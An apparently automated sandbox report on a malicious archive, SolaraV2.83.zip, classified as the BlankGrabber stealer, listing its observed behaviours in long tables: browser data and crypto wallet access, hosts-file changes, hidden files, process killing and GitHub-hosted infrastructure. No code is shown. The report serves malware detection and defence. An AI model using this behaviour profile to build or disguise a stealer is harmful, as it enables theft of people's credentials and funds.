Malware Analysis Report

2024-10-16 07:21

Sample ID 240626-gn1gysyelc
Target SolaraV2.83.zip
SHA256 76359f5ec0f6c8916ba4e07df1353b2a47c0979da198876de2348f1bc0ba6d4b
Tags
blankgrabber defense_evasion execution persistence privilege_escalation spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

76359f5ec0f6c8916ba4e07df1353b2a47c0979da198876de2348f1bc0ba6d4b

Threat Level: Known bad

The file SolaraV2.83.zip was found to be: Known bad.

Malicious Activity Summary

blankgrabber defense_evasion execution persistence privilege_escalation spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Hide Artifacts: Hidden Files and Directories

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Views/modifies file attributes

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Detects videocard installed

Enumerates processes with tasklist

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Runs ping.exe

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Gathers system information

Kills process with taskkill

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 05:57

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 05:57

Reported

2024-06-26 06:08

Platform

win10v2004-20240611-en

Max time kernel

557s

Max time network

450s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI23162\rar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI54202\rar.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraV2.83\Solara\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\SolaraBootstrapper.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-200405930-3877336739-3533750831-1000\{1CEE768A-BE5B-4AC8-85BF-E8D5762265C0} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
